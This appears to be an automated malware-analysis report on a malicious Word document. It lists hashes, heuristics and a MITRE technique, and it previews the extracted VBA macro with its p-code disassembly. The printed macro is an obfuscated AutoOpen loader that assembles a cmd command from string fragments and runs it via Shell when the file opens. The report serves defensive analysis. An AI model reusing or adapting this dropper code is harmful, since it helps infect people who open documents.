Office (OLE) malware analysis — malicious · eb48d595e08a5d09

MALICIOUS

Office (OLE)

106.6 KB Created: 2018-08-10 18:55:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 1d64b51216ae7749e0133ebd486bbbb0 SHA-1: adf9ed27f9cae52b7f95b120638358ffa70f3641 SHA-256: eb48d595e08a5d098e6ce29c2edd5656169aa38e175ccb8fedefe91c9d1cc014

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample contains a legacy WordBasic auto-exec macro named AutoOpen, which is designed to execute automatically when the document is opened. The macro attempts to execute a command constructed from concatenated strings, including the literal 'vbKeyC'. This indicates the document is likely a loader for a secondary payload.

Heuristics 4

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44106 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	44106 bytes
SHA-256: `bf7d2e986adedcc224300147c92b1f2f6c83cd62c26d2bf06da84f140e45383d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VXzoOtZVpkqYRd" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next TypeName Sgn(211519271) TypeName 95 TypeName dwcBFA TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk) TypeName PrhbH Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825 TypeName Oct(7415 + wBbjOc) TypeName Hex(820) End Sub ' Processing file: /opt/analyzer/scan_staging/1b93d6b2ca844ef0baeaa08332267f4e.bin ' =============================================================================== ' Module streams: ' Macros/VBA/VXzoOtZVpkqYRd - 1982 bytes ' Line #0: ' FuncDefn (Sub AutoOpen()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' LitDI4 0x8727 0x0C9B ' FnSgn ' ArgsCall TypeName 0x0001 ' Line #3: ' LitDI2 0x005F ' ArgsCall TypeName 0x0001 ' Line #4: ' Ld dwcBFA ' ArgsCall TypeName 0x0001 ' Line #5: ' Ld PRhtji ' Ld pzwJz ' LitDI4 0x55A4 0x0001 ' Mul ' Sub ' Ld zFlLNk ' Sub ' ArgsLd Atn 0x0001 ' ArgsCall TypeName 0x0001 ' Line #6: ' Ld PrhbH ' ArgsCall TypeName 0x0001 ' Line #7: ' Ld vbKeyC ' ArgsLd KeyString 0x0001 ' Ld JQjiYpwTYJh ' Add ' Ld wADEWZn ' Add ' Ld qkocjRXozk ' Add ' Ld SrLJcKU ' Add ' Ld jqfOKroKkj ' Add ' Ld UVMStnSwnuS ' Add ' Ld cXoQHhaw ' Add ' Ld XfuLUTYcN ' Add ' Ld qjOpKzfk ' Add ' Ld khOUbITmDB ' Add ' Ld SwAEVG ' Add ' Ld hNfIrziVNvNEYQ ' Add ' Ld SRmwQuwFmolR ' Add ' LitDI4 0x16D9 0x2C98 ' LitDI4 0x16D9 0x2C98 ' Sub ' ArgsCall Shell@ 0x0002 ' Line #8: ' LitDI2 0x1CF7 ' Ld wBbjOc ' Add ' ArgsLd Oct 0x0001 ' ArgsCall TypeName 0x0001 ' Line #9: ' LitDI2 0x0334 ' ArgsLd Hex 0x0001 ' ArgsCall TypeName 0x0001 ' Line #10: ' EndSub ' Line #11: ' Macros/VBA/HqzoUYE - 22104 bytes ' Line #0: ' FuncDefn (Function qkocjRXozk()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' LitDI2 0x0008 ' ArgsCall TypeName 0x0001 ' Line #3: ' LitDI2 0x0005 ' ArgsCall TypeName 0x0001 ' Line #4: ' Ld € ÿ kZjddf¬\| € ÿ KwzmUacÂ € ÿ XbOsu.E ' € ÿ RtUVbJWOdTÑ € ÿ hanNcÓZ € ÿ pFfiCcÉ‹ € ÿ wdowEUà( € ÿ patquL ¯ € ÿ WutWJiè € ÿ jMmupzØª € ÿ JaI ' Ld òÅ € ÿ wmhREY%Í Tan-Ø € ÿ NwCriYî\ € ÿ VAzENw#˜ € ÿ vtzTBPB € ÿ bOFKjU { € ÿ RSdw ' Div ' Ld Id ' Ld PUS‚Ð ChrBŽš € ÿ vpIMw Ð € ÿ nCbMbosºÃ € ÿ kdcvQJ ' Mul ' Add ' Coerce (Bool) ' ArgsCall TypeName 0x0001 ' Line #5: ' LitStr 0x0002 "md" ' LitStr 0x0002 " /" ' Add ' LitStr 0x0001 "V" ' Add ' LitStr 0x0001 ":" ' Add ' LitStr 0x0002 "ON" ' Add ' LitStr 0x0001 "/" ' Add ' LitStr 0x0001 "C" ' Add ' Ld DHwjkFiKnnA ' Ld arsJrZ ' Add ' LitDI2 0x0022 ' Add ' Ld UUEhpW ' Add ' Ld nPHdqT ' Add ' ArgsLd dbwkHm 0x0001 ' Coerce (Str) ' Add ' LitStr 0x0001 "s" ' Add ' St ZzMiiL ' Line #6: ' LitDI2 0x03B8 ' ArgsCall TypeName 0x0001 ' Line #7: ' LitDI4 0xD4E5 0x0A95 ' ArgsCall TypeName 0x0001 ' Line #8: ' LitStr 0x0001 "e" ' LitStr 0x0003 "t #" ' Add ' LitStr 0x0001 " " ' Add ' LitStr 0x0003 " =" ' Add ' LitStr 0x0003 " " ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Line #9: ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Line #10: ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Line #11: ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ' Imp ... (truncated)

SHA-256: bf7d2e986adedcc224300147c92b1f2f6c83cd62c26d2bf06da84f140e45383d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VXzoOtZVpkqYRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName Sgn(211519271)
   TypeName 95
   TypeName dwcBFA
   TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk)
   TypeName PrhbH
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
   TypeName Oct(7415 + wBbjOc)
   TypeName Hex(820)
End Sub


' Processing file: /opt/analyzer/scan_staging/1b93d6b2ca844ef0baeaa08332267f4e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/VXzoOtZVpkqYRd - 1982 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitDI4 0x8727 0x0C9B 
' 	FnSgn 
' 	ArgsCall TypeName 0x0001 
' Line #3:
' 	LitDI2 0x005F 
' 	ArgsCall TypeName 0x0001 
' Line #4:
' 	Ld dwcBFA 
' 	ArgsCall TypeName 0x0001 
' Line #5:
' 	Ld PRhtji 
' 	Ld pzwJz 
' 	LitDI4 0x55A4 0x0001 
' 	Mul 
' 	Sub 
' 	Ld zFlLNk 
' 	Sub 
' 	ArgsLd Atn 0x0001 
' 	ArgsCall TypeName 0x0001 
' Line #6:
' 	Ld PrhbH 
' 	ArgsCall TypeName 0x0001 
' Line #7:
' 	Ld vbKeyC 
' 	ArgsLd KeyString 0x0001 
' 	Ld JQjiYpwTYJh 
' 	Add 
' 	Ld wADEWZn 
' 	Add 
' 	Ld qkocjRXozk 
' 	Add 
' 	Ld SrLJcKU 
' 	Add 
' 	Ld jqfOKroKkj 
' 	Add 
' 	Ld UVMStnSwnuS 
' 	Add 
' 	Ld cXoQHhaw 
' 	Add 
' 	Ld XfuLUTYcN 
' 	Add 
' 	Ld qjOpKzfk 
' 	Add 
' 	Ld khOUbITmDB 
' 	Add 
' 	Ld SwAEVG 
' 	Add 
' 	Ld hNfIrziVNvNEYQ 
' 	Add 
' 	Ld SRmwQuwFmolR 
' 	Add 
' 	LitDI4 0x16D9 0x2C98 
' 	LitDI4 0x16D9 0x2C98 
' 	Sub 
' 	ArgsCall Shell@ 0x0002 
' Line #8:
' 	LitDI2 0x1CF7 
' 	Ld wBbjOc 
' 	Add 
' 	ArgsLd Oct 0x0001 
' 	ArgsCall TypeName 0x0001 
' Line #9:
' 	LitDI2 0x0334 
' 	ArgsLd Hex 0x0001 
' 	ArgsCall TypeName 0x0001 
' Line #10:
' 	EndSub 
' Line #11:
' Macros/VBA/HqzoUYE - 22104 bytes
' Line #0:
' 	FuncDefn (Function qkocjRXozk())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitDI2 0x0008 
' 	ArgsCall TypeName 0x0001 
' Line #3:
' 	LitDI2 0x0005 
' 	ArgsCall TypeName 0x0001 
' Line #4:
' 	Ld    €  ÿ   kZjddf¬|   €  ÿ   KwzmUacÂ   €  ÿ   XbOsu.E  
' €  ÿ   RtUVbJWOdTÑ    €  ÿ   hanNcÓZ   €  ÿ   pFfiCcÉ‹   €  ÿ   wdowEUà(   €  ÿ   patquL ¯   €  ÿ   WutWJiè   €  ÿ   jMmupzØª  	€  ÿ   JaI 
' 	Ld òÅ   €  ÿ   wmhREY%Í    Tan-Ø   €  ÿ   NwCriYî\   €  ÿ   VAzENw#˜   €  ÿ   vtzTBPB   €  ÿ   bOFKjU {   €  ÿ   RSdw 
' 	Div 
' 	Ld  Id 
' 	Ld PUS‚Ð    ChrBŽš   €  ÿ   vpIMw Ð   €  ÿ   nCbMbosºÃ   €  ÿ   kdcvQJ 
' 	Mul 
' 	Add 
' 	Coerce (Bool) 
' 	ArgsCall TypeName 0x0001 
' Line #5:
' 	LitStr 0x0002 "md"
' 	LitStr 0x0002 " /"
' 	Add 
' 	LitStr 0x0001 "V"
' 	Add 
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0002 "ON"
' 	Add 
' 	LitStr 0x0001 "/"
' 	Add 
' 	LitStr 0x0001 "C"
' 	Add 
' 	Ld DHwjkFiKnnA 
' 	Ld arsJrZ 
' 	Add 
' 	LitDI2 0x0022 
' 	Add 
' 	Ld UUEhpW 
' 	Add 
' 	Ld nPHdqT 
' 	Add 
' 	ArgsLd dbwkHm 0x0001 
' 	Coerce (Str) 
' 	Add 
' 	LitStr 0x0001 "s"
' 	Add 
' 	St ZzMiiL 
' Line #6:
' 	LitDI2 0x03B8 
' 	ArgsCall TypeName 0x0001 
' Line #7:
' 	LitDI4 0xD4E5 0x0A95 
' 	ArgsCall TypeName 0x0001 
' Line #8:
' 	LitStr 0x0001 "e"
' 	LitStr 0x0003 "t #"
' 	Add 
' 	LitStr 0x0001 " "
' 	Add 
' 	LitStr 0x0003 "  ="
' 	Add 
' 	LitStr 0x0003 "   "
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' Line #9:
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' Line #10:
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' Line #11:
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 
' 	Imp 

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.